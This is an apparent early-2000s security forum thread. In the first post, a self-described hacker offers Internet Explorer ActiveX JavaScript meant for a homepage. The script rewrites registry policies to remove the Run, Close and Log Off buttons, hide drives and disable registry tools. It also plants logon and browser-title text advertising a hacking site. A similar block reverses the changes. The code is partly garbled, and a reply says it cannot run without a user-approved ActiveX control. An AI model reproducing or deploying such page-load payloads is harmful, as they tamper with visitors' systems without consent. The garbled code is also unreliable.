A bug of IEon html
Results 1 to 3 of 3

Thread: A bug of IEon html

  1. #1
    Junior Member
    Join Date
    Aug 2001
    Posts
    1

    A bug of IEon html

    If we save files of hrml as txt .jpg .gif .bmp .stm,IE can run them!
    If we write that on our honepage!Horrible thing will happen
    document.write("");

    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {

    ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();


    try
    {
    if (documents .cookies.indexOf("Chg") == -1)
    {

    //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://com.6to23.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoRun", 01, "REG_BINARY"); //消除RUN按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoClose", 01, "REG_BINARY"); //消除关闭按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoLogOff", 01, "REG_BINARY"); //消除注销按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoDrives", "63000000", "REG_DWORD"); //隐藏盘符
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\System\\DisableRegistryTools", "00000001", "REG_DWORD"); //禁止注册表
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\Disabled", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeCaption", "您的计算机已*被http://www.cnhack.org/优化: )");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeText", "您的计算机已*被http://www.cnhack.org/优化: )");
    //设置开机提示
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
    //设置IE标题
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }

    init();

    以下是利用一段类似的JavaScript代码修复各项的键值:

    document.write("");

    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {
    ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();

    try
    {
    if (documents .cookies.indexOf("Chg") == -1)
    {

    //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://com.6to23.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoRun", 00, "REG_BINARY"); //修复RUN按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoClose", 00, "REG_BINARY"); //修复关闭按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoLogOff", 00, "REG_BINARY"); //修复注销按纽
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoDrives", "00000000", "REG_DWORD"); //取消隐藏盘符
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\System\\DisableRegistryTools", "00000000", "REG_DWORD"); //取消禁止注册表
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\Disabled", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeCaption", "");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeText", "");
    //重设开机提示
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "Microsoft Internet Explorer");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "Microsoft Internet Explorer"); //重设IE标题
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }

    init();
    wherever I go,whatever I do,I\'m a hacker!!!!!
    Share on Google+

  2. #2
    Banned
    Join Date
    Aug 2001
    Location
    Yes
    Posts
    4,429
    Does anyone know what he's talking about?
    Share on Google+

  3. #3
    Banned
    Join Date
    Jul 2001
    Posts
    264
    What you posted will not work. You cannot run shell commands, reg entries, etc. through a client browser without a signed ActiveX control. The only way that will work is *if* the user is lame enough to O.k. the control.
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides